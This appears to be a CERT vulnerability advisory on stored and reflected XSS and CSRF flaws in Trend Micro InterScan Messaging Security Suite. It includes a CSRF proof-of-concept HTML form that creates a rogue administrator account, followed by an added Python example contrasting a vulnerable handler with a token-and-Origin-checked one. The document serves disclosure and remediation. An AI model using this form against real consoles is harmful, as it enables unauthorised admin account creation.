Vulnerability Note VU#471364

Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities

Original Release date: 13 Sep 2012 | Last revised: 14 Aug 2014


Trend Micro InterScan Messaging Security Suite Version 7.1-Build_Win32_1394 has been reported to be susceptible to cross-site scripting and cross-site request forgery vulnerabilities.


Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) and cross-site request forgery (CWE-352) vulnerabilities.

Cross-site scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS

Non-persistent/Reflected XSS

Cross-site request forgery (CVE-2012-2996) (CWE-352)
CSRF proof of concept: add an administrator account

<form action="hxxps://" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra&#46;123" />
<input type="hidden" name="confirmPwd" value="quorra&#46;123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
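The form above works because the console honours any POST that arrives with the administrator's session cookie, whether or not the request originated from the console's own pages. The following is an added Python example, not code from the advisory or from Trend Micro, that models the "saveAuth" handler twice: once with the weakness as described, and once with a per-session synchronizer token plus an Origin/Referer check, which is the standard server-side fix. The console origin, the session and request types, and the parameter names beyond those in the proof-of-concept form are assumptions for illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional
from urllib.parse import parse_qs, urlparse

# Constructed stand-in for the admin console's own origin; the real host is not on the page.
CONSOLE_ORIGIN = "https://imss-console.example.invalid"


@dataclass
class Session:
    """Authenticated console session; the CSRF token is minted once per session."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal model of an HTTP request with a form-encoded body (assumed shape)."""
    method: str
    headers: Dict[str, str]
    body: str
    session: Optional[Session]

    @property
    def form(self) -> Dict[str, str]:
        return {k: v[0] for k, v in parse_qs(self.body, keep_blank_values=True).items()}


def _save_account(form: Dict[str, str], accounts: Dict[str, str]) -> bool:
    """Shared business logic: only the 'saveAuth' action with matching passwords creates an account."""
    if form.get("tabAction") != "saveAuth" or not form.get("name"):
        return False
    if form.get("password") != form.get("confirmPwd"):
        return False
    accounts[form["name"]] = form["password"]
    return True


def create_admin_vulnerable(req: Request, accounts: Dict[str, str]) -> bool:
    """Mirrors the weakness in the advisory: any POST carried by an authenticated
    browser session is honoured, regardless of which page built the form."""
    if req.session is None or req.method != "POST":
        return False
    return _save_account(req.form, accounts)


def create_admin_hardened(req: Request, accounts: Dict[str, str]) -> bool:
    """Same handler with two independent CSRF defences that a third-party page cannot satisfy:
    1. the Origin header (or Referer as fallback) must match the console's own origin, and
    2. the form must echo the per-session synchronizer token."""
    if req.session is None or req.method != "POST":
        return False
    # Browsers attach Origin to cross-site POSTs; reject when neither header is present.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source is None:
        return False
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != CONSOLE_ORIGIN:
        return False
    form = req.form
    # Constant-time comparison so token checking does not leak timing information.
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, req.session.csrf_token.encode()):
        return False
    return _save_account(form, accounts)


def demo() -> Dict[str, bool]:
    """Replays the advisory's proof-of-concept form body against both handlers."""
    session = Session(user="admin")
    # Constructed body a browser would send for the PoC form (&#46; decodes to '.').
    poc_body = ("enabled=on&authMethod=1&name=quorra&password=quorra.123"
                "&confirmPwd=quorra.123&tabAction=saveAuth&gotoTab=saveAll")
    cross_site = Request("POST", {"Origin": "https://attacker.example.invalid"}, poc_body, session)
    same_site_no_token = Request("POST", {"Origin": CONSOLE_ORIGIN}, poc_body, session)
    same_site = Request("POST", {"Origin": CONSOLE_ORIGIN},
                        poc_body + "&csrf_token=" + session.csrf_token, session)
    return {
        "vulnerable_cross_site": create_admin_vulnerable(cross_site, {}),
        "hardened_cross_site": create_admin_hardened(cross_site, {}),
        "hardened_same_site_no_token": create_admin_hardened(same_site_no_token, {}),
        "hardened_same_site": create_admin_hardened(same_site, {}),
    }


if __name__ == "__main__":
    print(demo())
```

The two checks are deliberately independent: the Origin check alone fails open for clients that strip the header, and the token alone is defeated if the token ever leaks through the XSS flaw described above, which is one reason the two CVEs in this note compound each other. A real deployment would also mark the session cookie `SameSite` and re-prompt for the current administrator's password on account-creation actions.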


An unauthenticated attacker may be able to execute arbitrary script in the context of a logged-in user's session.


We are currently unaware of a practical solution to this problem. Please consider the following workarounds.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from accessing the InterScan Messaging Security Suite using stolen credentials from a blocked network location.

Vendor Information

Vendor       Status    Date Notified  Date Updated
Trend Micro  Affected  10 Aug 2012    12 Sep 2012
If you are a vendor and your product is affected, let us know.

CVSS Metrics

Group          Score  Vector
Base           6.8    AV:N/AC:M/Au:N/C:P/I:P/A:P
Temporal       5.5    E:POC/RL:U/RC:UC
Environmental  1.4    CDP:ND/TD:L/CR:ND/IR:ND/AR:ND



Thanks to Tom Gregory for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

  • CVE IDs: CVE-2012-2995 CVE-2012-2996
  • Date Public: 13 Sep 2012
  • Date First Published: 13 Sep 2012
  • Date Last Updated: 14 Aug 2014
  • Document Revision: 18


If you have feedback, comments, or additional information about this vulnerability, please send us email.